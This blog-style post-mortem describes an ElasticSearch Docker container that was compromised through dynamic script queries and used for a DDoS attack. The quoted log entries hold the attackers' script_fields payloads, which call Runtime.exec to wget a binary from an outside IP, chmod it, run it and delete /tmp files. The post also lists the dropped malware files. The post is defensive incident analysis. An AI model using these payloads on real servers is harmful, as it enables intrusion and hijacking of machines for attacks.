Being hacked is an interesting experience. There are five stages to being hacked. The first is denial: deciding there is no way someone could hack you. The second is blame: believing it was some other problem and not hackers. The third is acceptance: wondering whether you really were hacked. The fourth is fear of what they did. The final stage is investigation, where the fun starts as you find out what they did.

These stages happened to me after launching an ElasticSearch instance on a Digital Ocean droplet using Docker. An external service required the ElasticSearch instance, but only for a demo; it was never intended for production use. The problem arose after I forgot to turn off the Docker container and the droplet. Here’s what happened next.

Digital Ocean gets unhappy





The first sign of anything going wrong was an email from Digital Ocean. The email indicated that they had terminated network access to one of my droplets.

In the control panel the bandwidth graph indicated high outbound bandwidth. At its peak it was over 500Mbps. This had all the hallmarks of an outgoing DDoS attack, but I had no idea how they gained entry.

Even with network access terminated you can still control the droplet via Digital Ocean’s VNC console.

Investigating the hack

To start I performed the basic checks to see what went wrong. I checked for security updates and running processes but nothing highlighted any issues. I ran standard debug tools such as lsof to check for open network connections and files but they didn’t show anything. It turns out I had rebooted the machine while attempting to regain access. This was a silly mistake as any active processes and connections were closed. Part of the reason why Digital Ocean only removes network access is so you can debug the active state.

At this point I was confused. It’s then I looked towards the running Docker containers.

Analysing a Hacked Docker Instance

On the host I had a number of Docker containers running. One of these was the latest ElasticSearch.

After viewing the logs I found some really interesting entries. There was a higher number of errors than normal. These errors didn’t relate to the demo that was running, and they often referenced files in /tmp/. This caused alarm bells to start ringing.

What did the hackers do?

As ElasticSearch was running inside a container I could identify the exact impact. I was also confident that the hack was contained and they didn’t gain access to the host.

The ElasticSearch logs gave clues to the commands executed. From the logs the hack attempt lasted from 2015-07-05 03:29:29,674 until 2015-07-11 06:54:02,332. This is likely to be when Digital Ocean pulled the plug.
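
As a quick check on how long that window was, here is a minimal sketch that subtracts the two timestamps quoted above. The format string is an assumption based on how the timestamps are printed (milliseconds after a comma), and the variable names are purely illustrative.

```python
from datetime import datetime

# Assumed format: date, time, then a comma followed by milliseconds.
LOG_TIME_FORMAT = "%Y-%m-%d %H:%M:%S,%f"

# Timestamps copied from the paragraph above.
first_seen = datetime.strptime("2015-07-05 03:29:29,674", LOG_TIME_FORMAT)
last_seen = datetime.strptime("2015-07-11 06:54:02,332", LOG_TIME_FORMAT)

# Subtracting two datetimes gives a timedelta covering the attack window.
attack_window = last_seen - first_seen
print(attack_window)
```

The result is a little over six days, which is how long the container was being used before network access was cut.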

The queries executed took the form of Java code. The code downloaded assets and then executed them.

org.elasticsearch.search.SearchParseException: [index][3]: query[ConstantScore(*:*)],from[-1],size[1]: Parse Failure [Failed to parse source [{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"script":"import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/xdvi http://<ip address>:9985/xdvi\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();"}}}]]

org.elasticsearch.search.SearchParseException: [esindex][4]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"chmod 777 /tmp/cmd\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}}, "size": 1}]]

org.elasticsearch.search.SearchParseException: [esindex][2]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"/tmp/cmd\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}}, "size": 1}]]

The hackers cared enough to clean up after themselves, which was nice of them.

org.elasticsearch.search.SearchParseException: [esindex][2]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"rm -r /tmp/*\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}}, "size": 1}]]
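
The shell commands buried in entries like these can be pulled out with a short script. This is only a sketch, assuming every command appears as an escaped string passed to Runtime.getRuntime().exec(...) in the same way as the entries above; the function name and the shortened sample line are illustrative, not part of any tool I used.

```python
import re

# Matches the command inside .exec(\"...\") as it appears in the escaped
# JSON of the log entries (a backslash precedes each double quote).
EXEC_PATTERN = re.compile(r'\.exec\(\\"(.+?)\\"\)')


def extract_commands(log_text):
    """Return every shell command passed to exec() in the log text, in order."""
    return EXEC_PATTERN.findall(log_text)


# Shortened excerpt of one of the log entries above (hypothetical trimming).
sample = r'new InputStreamReader(Runtime.getRuntime().exec(\"chmod 777 /tmp/cmd\").getInputStream())'

for command in extract_commands(sample):
    print(command)
```

Run over the full log file, this would give a timeline of what the attackers tried to execute without having to read each exception by eye.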



As the attack was still running they didn’t get the chance to remove all the files. Every Docker container is based on an image, and any changes the container makes to the filesystem are stored separately. The command docker diff <container> lists the files and directories added (A) or changed (C). Here’s the list:

C /bin

C /bin/netstat

C /bin/ps

C /bin/ss

C /etc

C /etc/init.d

A /etc/init.d/DbSecuritySpt

A /etc/init.d/selinux

C /etc/rc1.d

A /etc/rc1.d/S97DbSecuritySpt

A /etc/rc1.d/S99selinux

C /etc/rc2.d

A /etc/rc2.d/S97DbSecuritySpt

A /etc/rc2.d/S99selinux

C /etc/rc3.d

A /etc/rc3.d/S97DbSecuritySpt

A /etc/rc3.d/S99selinux

C /etc/rc4.d

A /etc/rc4.d/S97DbSecuritySpt

A /etc/rc4.d/S99selinux

C /etc/rc5.d

A /etc/rc5.d/S97DbSecuritySpt

A /etc/rc5.d/S99selinux

C /etc/ssh

A /etc/ssh/bfgffa

A /os6

A /safe64

C /tmp

A /tmp/.Mm2

A /tmp/64

A /tmp/6Sxx

A /tmp/6Ubb

A /tmp/DDos99

A /tmp/cmd.n

A /tmp/conf.n

A /tmp/ddos8

A /tmp/dp25

A /tmp/frcc

A /tmp/gates.lod

A /tmp/hkddos

A /tmp/hsperfdata_root

A /tmp/linux32

A /tmp/linux64

A /tmp/manager

A /tmp/moni.lod

A /tmp/nb

A /tmp/o32

A /tmp/oba

A /tmp/okml

A /tmp/oni

A /tmp/yn25

C /usr

C /usr/bin

A /usr/bin/.sshd

A /usr/bin/bsd-port

A /usr/bin/bsd-port/conf.n

A /usr/bin/bsd-port/getty

A /usr/bin/bsd-port/getty.lock

A /usr/bin/dpkgd

A /usr/bin/dpkgd/netstat

A /usr/bin/dpkgd/ps

A /usr/bin/dpkgd/ss
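
A list this long is easier to reason about once it is grouped. The following is a minimal sketch, assuming the docker diff output has been saved as text with one "<letter> <path>" entry per line; the function names are hypothetical and the sample is a handful of lines taken from the list above.

```python
from collections import defaultdict


def parse_docker_diff(output):
    """Group paths by change type: 'A' (added), 'C' (changed), 'D' (deleted)."""
    changes = defaultdict(list)
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue  # tolerate blank lines between entries
        kind, path = line.split(maxsplit=1)
        changes[kind].append(path)
    return dict(changes)


def added_outside_tmp(changes):
    """Added paths outside /tmp, which suggest attempts at persistence."""
    return [p for p in changes.get("A", []) if not p.startswith("/tmp/")]


sample = """
C /bin/ps
A /etc/init.d/DbSecuritySpt
A /tmp/DDos99
A /usr/bin/dpkgd/ps
"""

changes = parse_docker_diff(sample)
print(added_outside_tmp(changes))
```

Filtering out /tmp is just one design choice. The entries under /etc/init.d and the changed copies of ps, netstat and ss are the ones that stand out once the noise is removed.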

With the help of the log files it looks like they uploaded and executed one command. This proceeded to download and launch the DDoS attack, a popular command and control pattern.

Investigating the files

My debug skills only go so far but I did manage to find a few titbits of information. Most of the files are statically linked binaries, reported as either "application/octet-stream; charset=binary" or "ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=5036c5788090829d54797078db7c67a9b0571db4, stripped". It’s interesting to read the logs as you can spot the attackers working out whether the OS is Windows or Linux.
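
The "ELF 32-bit LSB" part of that description comes straight from the first few bytes of the file, so it can be checked without running anything. Here is a minimal sketch, assuming only the standard ELF identification bytes (magic number, class, byte order); the function names are hypothetical, and it reports far less than a full file-type tool would.

```python
ELF_MAGIC = b"\x7fELF"
ELF_CLASSES = {1: "32-bit", 2: "64-bit"}    # fifth byte of the header
ELF_BYTE_ORDERS = {1: "LSB", 2: "MSB"}      # sixth byte of the header


def describe_elf_header(header):
    """Return e.g. 'ELF 32-bit LSB' for an ELF header, or None otherwise."""
    if len(header) < 6 or header[:4] != ELF_MAGIC:
        return None
    word_size = ELF_CLASSES.get(header[4], "unknown class")
    byte_order = ELF_BYTE_ORDERS.get(header[5], "unknown byte order")
    return f"ELF {word_size} {byte_order}"


def describe_file(path):
    """Read only the first six bytes of a file; the file is never executed."""
    with open(path, "rb") as handle:
        return describe_elf_header(handle.read(6))


print(describe_elf_header(b"\x7fELF\x01\x01"))
```

Anything that comes back as None is not an ELF binary and needs a different kind of inspection.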

The logs did highlight one source. The command executed was wget -O /tmp/cmd http://<IP Address>:8009/cmd. This pointed towards a Windows 2003 server, running IIS, in China. It was likely hacked itself and then used as a distribution point.



The root cause

So what vulnerability did they exploit? It wasn’t an exploit; instead the attack used a feature of ElasticSearch: the ability to run scripts as part of a search query, as seen in the script_fields entries in the logs. This demonstrates why you shouldn’t expose these types of services to the outside world. Docker makes it easy to expose services to the outside world but as a result it’s also easy to forget that people are looking for targets.
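
One way to find out whether a service is reachable is simply to try connecting to it from another machine. This is a rough sketch rather than a proper port scanner: the function name is hypothetical, and port 9200 is assumed because it is ElasticSearch's default HTTP port, not because the logs state it.

```python
import socket


def is_port_open(host, port, timeout=2.0):
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts and unreachable hosts.
        return False


if __name__ == "__main__":
    # Assumed default ElasticSearch HTTP port; replace the host with the
    # public address of the machine you want to check.
    print(is_port_open("127.0.0.1", 9200))
```

If this returns True when pointed at the droplet's public address from outside, anyone else on the internet can reach the service too.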

How the attack worked and the intended target is a little harder to understand. I’ve exported the container as a Docker image. If anyone is interested then please contact me and I’ll send you what I have.

Before the “Docker’s insecure” comments

If I had run the process on the host and opened the ports then it still would have been hacked. The only difference is they would have had access to the entire machine instead of just the container.

The reason I was hacked is that I opened up a powerful database to the outside world so that other services could access it.





I find it more interesting to consider how a new deployment approach like Docker could allow infrastructure to be secure by default. The future “Docker & Containers in Production” course on Scrapbook and my workshops will cover these aspects.

Lessons

There are three major lessons to be taken away from this.

1) Don’t expose services to the internet without authentication, even for a short period of time.

2) It’s important to monitor containers for malicious activity and strange behaviour. I’ll cover how Scrapbook (my current project) handles this in a future blog post.

3) Next time I want a sandboxed environment I’ll use Scrapbook to spin up sandboxed learning environments.